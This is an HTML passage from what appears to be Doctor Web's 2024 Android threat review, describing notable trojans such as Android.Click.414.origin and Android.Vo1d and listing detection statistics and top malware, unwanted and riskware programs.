            &lt;li&gt;The emergence of many new threats on Google Play.&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/div&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="events"&gt;
    &lt;h2 class="alignCenter"&gt;The most notable events of 2024&lt;/h2&gt;
    &lt;p&gt;
        Last May, Doctor Web’s experts 
        &lt;a href="https://news.drweb.com/show/?i=14860&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;informed&lt;/a&gt;
        users about the &lt;a href="https://vms.drweb.com/search/?q=Android.Click.414.origin&amp;lng=en"&gt;&lt;b&gt;Android.Click.414.origin&lt;/b&gt;&lt;/a&gt; trojan clicker, which was found in an app used to control sex toys 
        and in software for tracking physical activity. Both programs were distributed through Google Play and had more than 
        1.5 million installs combined. 
        &lt;a href="https://vms.drweb.com/search/?q=Android.Click.414.origin&amp;lng=en"&gt;&lt;b&gt;Android.Click.414.origin&lt;/b&gt;&lt;/a&gt; had a modular structure and used its components to execute certain tasks. 
        For example, the trojan covertly loaded advertising websites and performed various actions on them. It could 
        scroll webpages, enter text into forms, mute audio on webpages, and take screenshots of webpages to analyze 
        their contents and click on desired areas. In addition, &lt;a href="https://vms.drweb.com/search/?q=Android.Click.414.origin&amp;lng=en"&gt;&lt;b&gt;Android.Click.414.origin&lt;/b&gt;&lt;/a&gt; 
        sent detailed information about infected devices to its C&amp;C server. At the same time, the clicker did not 
        specifically attack certain users, and it did not start on devices where the interface language was set to Chinese.
    &lt;/p&gt;

    &lt;div class=" flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/01_Android.Click.414.origin_2024_1.png" class="preview"&gt;
              &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/01_Android.Click.414.origin_2024_1.1.png" alt="Android.Click_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/01_Android.Click.414.origin_2024_2.png" class="preview"&gt;
              &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/01_Android.Click.414.origin_2024_2.1.png" alt="Android.Click_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Some versions of the Love Spouse and QRunning programs had the &lt;b&gt;Android.Click.414.origin&lt;/b&gt; trojan hidden in them&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        In September, our specialists revealed the details of their 
        &lt;a href="https://news.drweb.com/show/?i=14900&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;analysis&lt;/a&gt;
        regarding cases of Android TV box sets being infected with the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; backdoor. 
        This modular malware affected nearly 1.3 million devices belonging to users in 197 countries. 
        It placed its components into the system storage area and could covertly download and install 
        third-party software when commanded by threat actors.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/02_Android.Vo1d_map_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/02_Android.Vo1d_map_en.png" alt="Android.Void_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Countries found to have the highest number of TV boxes infected with the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; backdoor&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Then in November, our virus analysts used &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; as an example 
        &lt;a href="https://news.drweb.com/show/?i=14935&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;to show&lt;/a&gt;
        how threat actors use the DNS protocol to covertly connect malware to C&amp;C servers. 
        &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; is a rather primitive trojan whose only task is to load target websites. 
        It differs from most of the threats similar to it in that it receives the addresses of target sites from the 
        TXT record of a malicious DNS server. For this, it uses modified code from the open-source dnsjava library. 
        At the same time, &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; 
        manifests its malicious nature only when connected to the Internet through certain providers; in other cases it operates as harmless software.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/03_Android.FakeApp.1669_c2_response.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/03_Android.FakeApp.1669_c2_response.png" alt="DNS_Trojan_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;An example of a target domain’s TXT record. It was sent by the DNS server upon request via the Linux ‘dig’ tool while one of the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; modifications was undergoing analysis&lt;/em&gt;&lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="stat"&gt;
    &lt;h2 class="alignCenter"&gt;Statistics&lt;/h2&gt;
    &lt;p&gt;
        According to detection statistics collected by Dr.Web Security Space for mobile devices, malicious programs were the threats most 
        commonly detected in 2024. They accounted for 74.67% of all registered detections. Adware programs, with a share of 10.96%, ranked 
        second. Riskware apps, which accounted for 10.55% of all detections, ranked third. The fourth most common threats were unwanted apps, 
        which users encountered in 3.82% of cases.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/04_threat_share_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/04_threat_share_2024_en.png" alt="Android_Danger_Stat_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    
    &lt;h3&gt;Malicious programs&lt;/h3&gt;
    &lt;p&gt;
        Once again the malicious Android apps most commonly encountered were ad-displaying trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; family. 
        Over the course of last year, their share of the total number of malware programs detected by the Dr.Web anti-virus increased by 0.34 pp. to 31.95% of all detections.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/05_Android.HiddenAds_dynamics_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/05_Android.HiddenAds_dynamics_2024_en.png" alt="Android.Hidden.Ads_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        In this malware family, the most active member was &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3956&lt;/b&gt;
        (15.10% of the detections for the entire family and 4.84% of all malware detected). This is one of many variants of 
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1994&lt;/b&gt; malware that users have been encountering for several years now. This particular version, 
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3956&lt;/b&gt;, emerged in 2023 along with other modifications. We 
        &lt;a href="https://news.drweb.com/show/review/?i=14846&amp;lng=en#stat" target="_blank" rel="noopener noreferrer"&gt;predicted&lt;/a&gt;
        that it could take a leading position in the family, which is what eventually happened. In 2024, its new variants also became widespread: 
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3980&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3989&lt;/b&gt;, 
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3994&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.655.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt;, and some others.
    &lt;/p&gt;
    &lt;p&gt;
        At the same time, our experts also noticed activity on the part of the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds.Aegis&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt; subfamily. 
        Unlike most other &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; malware, members of this group have the ability to autorun and have some other
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds.Aegis&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;features&lt;/a&gt;. 
        Modifications like &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds.Aegis&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;, 
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds.Aegis&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4.origin&lt;/b&gt;, 
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds.Aegis&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;, and &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds.Aegis&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; 
        were the ones most commonly detected on devices protected by Dr.Web anti-virus.
    &lt;/p&gt;
    &lt;p&gt;
        The second most widespread malicious programs were trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; 
        family, which cybercriminals use in various fraudulent schemes. Last year, they accounted for 
        18.28% of all malware detections, which is 16.45 pp. higher than the year before. Typically, 
        such trojans load unwanted websites designed for phishing attacks and online fraud.
    &lt;/p&gt;
    &lt;p&gt;
        &lt;a href="https://vms.drweb.com/search/?q=Android.Spy&amp;lng=en"&gt;&lt;b&gt;Android.Spy&lt;/b&gt;&lt;/a&gt; trojans, which have spyware functionality, ranked third with a share of 11.52%; 
        their share decreased by 16.7 pp., compared to 2023. As in the year before, the most common member of 
        this family was &lt;a href="https://vms.drweb.com/search/?q=Android.Spy.5106&amp;lng=en"&gt;&lt;b&gt;Android.Spy.5106&lt;/b&gt;&lt;/a&gt;. 
        It accounted for 5.95% of all detected malware.
    &lt;/p&gt;
    &lt;p&gt;
        In 2024, we observed a mixed trend in the distribution of malware that is designed to download and install other apps and capable 
        of executing arbitrary code. Compared to the previous year, the share of &lt;a href="https://vms.drweb.com/search/?q=Android.DownLoader&amp;lng=en"&gt;&lt;b&gt;Android.DownLoader&lt;/b&gt;&lt;/a&gt; downloader trojans decreased by 0.49 pp. 
        to 1.69%; the share of &lt;a href="https://vms.drweb.com/search/?q=Android.Mobifun&amp;lng=en"&gt;&lt;b&gt;Android.Mobifun&lt;/b&gt;&lt;/a&gt; trojans decreased by 0.15 pp. to 0.10%; and the share of &lt;a href="https://vms.drweb.com/search/?q=Android.Xiny&amp;lng=en"&gt;&lt;b&gt;Android.Xiny&lt;/b&gt;&lt;/a&gt; trojans decreased by 0.14 pp. to 0.13%. 
        At the same time, &lt;a href="https://vms.drweb.com/search/?q=Android.Triada&amp;lng=en"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.RemoteCode&amp;lng=en"&gt;&lt;b&gt;Android.RemoteCode&lt;/b&gt;&lt;/a&gt; trojans were detected more often. The number of detection cases for the former 
        increased by 0.6 pp. to 2.74%, and for the latter by 0.95 pp. to 3.78%.
    &lt;/p&gt;
    &lt;p&gt;
        The share of &lt;a href="https://vms.drweb.com/search/?q=Android.Packed&amp;lng=en"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt; malware protected by software packers decreased from 7.98% to 5.49%, nearly returning to the 2022 figure. 
        The number of attacks involving &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; adware trojans also decreased—from 10.06% to 5.38%. At the same time, the number of &lt;a href="https://vms.drweb.com/search/?q=Android.Locker&amp;lng=en"&gt;&lt;b&gt;Android.Locker&lt;/b&gt;&lt;/a&gt; 
        ransomware and &lt;a href="https://vms.drweb.com/search/?q=Android.Proxy&amp;lng=en"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt; trojan detections increased slightly—from 1.15% to 1.60% and from 0.57% to 0.81%, respectively. 
        &lt;a href="https://vms.drweb.com/search/?q=Android.Proxy&amp;lng=en"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt; trojans allow threat actors using infected Android devices to redirect their network traffic through them. In addition, the activity of 
        &lt;a href="https://vms.drweb.com/search/?q=Android.Click&amp;lng=en"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt; malicious programs increased significantly, from 0.82% to 3.56%. These trojans can open advertising websites and perform clicks on webpages.
    &lt;/p&gt;
    &lt;p&gt;The ten most commonly detected malicious programs in 2024:&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/06_top_malware_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/06_top_malware_2024_en.png" alt="Most_Common_Malware_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A trojan app that loads a website that is hardcoded into its settings. Known modifications of this malicious program load an online casino site.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Spy.5106&amp;lng=en"&gt;&lt;b&gt;Android.Spy.5106&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for a trojan that presents itself as modified versions of unofficial WhatsApp messenger mods. This malicious program can steal the contents of notifications and offer users other apps from unknown sources for installation. And when such a modified messenger is used, it can also display dialog boxes containing remotely configurable content.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3956&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3851&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.655.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3994&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Trojan apps designed to display intrusive ads. Members of the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; family are often distributed as popular and harmless applications. In some cases, other malware can install them in the system directory. When these infect Android devices, they typically conceal their presence from the user. For example, they “hide” their icons from the home screen menu.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Click.1751&amp;lng=en"&gt;&lt;b&gt;Android.Click.1751&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
        &lt;dd&gt;This trojan is built into third-party WhatsApp messenger mods and camouflaged as Google library classes. While the host application is being used, &lt;a href="https://vms.drweb.com/search/?q=Android.Click.1751&amp;lng=en"&gt;&lt;b&gt;Android.Click.1751&lt;/b&gt;&lt;/a&gt; connects to one of the C&amp;C servers and receives two URLs from it. One of them is intended for Russian-speaking users, and the other is for everyone else. The trojan then displays a dialog box whose contents it has also received from a remote server. When a user clicks on the confirmation button, malware loads the corresponding link in the browser.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds.Aegis&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A trojan app that conceals its presence on Android devices and displays intrusive ads. It has a number of characteristics that differentiate it from other members of the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; family. For example, this trojan can run automatically after its installation. Moreover, it implements a mechanism that allows its service to remain constantly running. And, in some cases, it can also use hidden Android operating system functions.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7815&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A trojan app that displays obnoxious ads. It is a special software module that developers incorporate into applications.&lt;/dd&gt;
    &lt;/dl&gt;

    &lt;h3&gt;Unwanted software&lt;/h3&gt;
    &lt;p&gt;
        The unwanted program most commonly detected in 2024 was &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;. It accounted for more than half (52.10%) of all 
        unwanted software detections on protected devices. It belongs to a class of apps that offer users a chance to make money by completing various tasks but ultimately 
        do not provide any real rewards.
    &lt;/p&gt;
    &lt;p&gt;
        Programs that Dr.Web anti-virus detects as &lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; ranked second, with a share of 19.21% (up 9.75 pp. from the previous year). 
        Such apps are modified through the CloudInject cloud service. During modification, dangerous permissions and obfuscated code are added to them, and the purpose 
        of that code cannot be controlled.
    &lt;/p&gt;
    &lt;p&gt;
        The activity of &lt;a href="https://vms.drweb.com/search/?q=Program.FakeAntiVirus&amp;lng=en"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; programs declined for the second year in a row. With a share of 10.07%, which is down 9.35 pp. 
        from 2023, these programs became the third most widespread unwanted software. They imitate anti-virus software, detect nonexistent threats, and 
        ask users to buy full versions to “fix” the issues that have allegedly been found.
    &lt;/p&gt;
    &lt;p&gt;
        Over the course of last year, users encountered a variety of programs for monitoring and controlling activity. Such software can be used to collect data, 
        both with the consent of device owners and without their knowledge. In the latter case, these actually turn into spying tools. The following monitoring 
        programs were most often detected on devices protected by Dr.Web anti-virus: 
        &lt;a href="https://vms.drweb.com/search/?q=Program.TrackView&amp;lng=en"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; (2.40% of cases), &lt;a href="https://vms.drweb.com/search/?q=Program.SecretVideoRecorder&amp;lng=en"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; (2.03% of cases), 
        &lt;a href="https://vms.drweb.com/search/?q=Program.wSpy&amp;lng=en"&gt;&lt;b&gt;Program.wSpy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt; (0.98% of cases), &lt;a href="https://vms.drweb.com/search/?q=Program.SecretVideoRecorder&amp;lng=en"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt; (0.90% of cases), 
        &lt;a href="https://vms.drweb.com/search/?q=Program.Reptilicus&amp;lng=en"&gt;&lt;b&gt;Program.Reptilicus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.8.origin&lt;/b&gt; (0.64% of cases), &lt;a href="https://vms.drweb.com/search/?q=Program.wSpy&amp;lng=en"&gt;&lt;b&gt;Program.wSpy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; (0.39% of cases), and &lt;a href="https://vms.drweb.com/search/?q=Program.MonitorMinor&amp;lng=en"&gt;&lt;b&gt;Program.MonitorMinor&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; (0.38% of cases).
    &lt;/p&gt;
    &lt;p&gt;
        Additionally, &lt;a href="https://vms.drweb.com/search/?q=Program.Opensite&amp;lng=en"&gt;&lt;b&gt;Program.Opensite&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt; Android programs, with a share of 0.60% of all the unwanted software detected, were also spotted. 
        These programs are designed to load target websites and display ads.
    &lt;/p&gt;
    &lt;p&gt;The ten unwanted programs most commonly detected in 2024:&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/07_top_unwanted_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/07_top_unwanted_2024_en.png" alt="Most_Common_Unwanted_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android applications that allegedly allow users to earn money by completing different tasks. These apps make it look as if rewards are accruing for each one that is completed. At the same time, users are told that they have to accumulate a certain sum to withdraw their “earnings”. Typically, such apps have a list of popular payment systems and banks that supposedly could be used to withdraw the rewards. But even if users succeed in accumulating the needed amount, in reality they cannot get any real payments. This virus record is also used to detect other unwanted software based on the source code of such apps.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android programs that have been modified using the CloudInject cloud service and the eponymous Android utility (the latter was added to the Dr.Web virus database as &lt;a href="https://vms.drweb.com/search/?q=Tool.CloudInject&amp;lng=en"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Such programs are modified on a remote server; meanwhile, the modders (users) who are interested in such modifications cannot control exactly what will be added to the apps. Moreover, these programs receive a number of dangerous system permissions. Once modification is complete, users can remotely manage these apps. They can block them, display custom dialogs, and track when other software is being installed or removed from a device, etc.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeAntiVirus&amp;lng=en"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for adware programs that imitate anti-virus software. These apps inform users of nonexistent threats, mislead them, and demand that they purchase the software’s full version.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.TrackView&amp;lng=en"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for a program that allows users to be monitored via their Android devices. Malicious actors can utilize it to track a target device’s location, use the camera to record video and take photos, eavesdrop via the microphone, record audio, etc.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.SecretVideoRecorder&amp;lng=en"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.SecretVideoRecorder&amp;lng=en"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for various modifications of an application that is designed to record videos and take photos in the background, using built-in Android device cameras. It can operate covertly by allowing notifications about ongoing recordings to be disabled. It also allows an app’s icon and name to be replaced with fake ones. This functionality makes this software potentially dangerous.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.wSpy&amp;lng=en"&gt;&lt;b&gt;Program.wSpy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;This is a commercial spyware app designed to covertly monitor Android device user activity. It allows intruders to read SMS and chats in popular messaging software, listen to the surroundings, track device location and browser history, gain access to the phonebook and contacts, photos and videos, and take screenshots and pictures through a device’s built-in camera. In addition, it has keylogger functionality.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.Reptilicus&amp;lng=en"&gt;&lt;b&gt;Program.Reptilicus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.8.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;An application that allows Android device users to be monitored. It can track device location, collect information from SMS and social media messages, intercept phone calls and record the surroundings, take screenshots, act as a keylogger, copy files from a target device and perform other actions.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.Opensite&amp;lng=en"&gt;&lt;b&gt;Program.Opensite&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for single-type Android programs whose function is to load target websites and display ads. Such apps often masquerade as other software. For instance, there exist modifications that are distributed under the guise of a YouTube player. They load the genuine YouTube website and display advertisement banners using the advertising SDKs connected to them.&lt;/dd&gt;
    &lt;/dl&gt;

    &lt;h3&gt;Riskware&lt;/h3&gt;
    &lt;p&gt;
        In 2024, &lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt; utilities, which allow Android programs to launch without being installed, retained their leading 
        positions in terms of riskware detection numbers. In total, they accounted for more than a third of all apps of this type identified 
        on protected devices. Modifications like &lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.17.origin&lt;/b&gt; (16.17%), &lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt; (9.80%), 
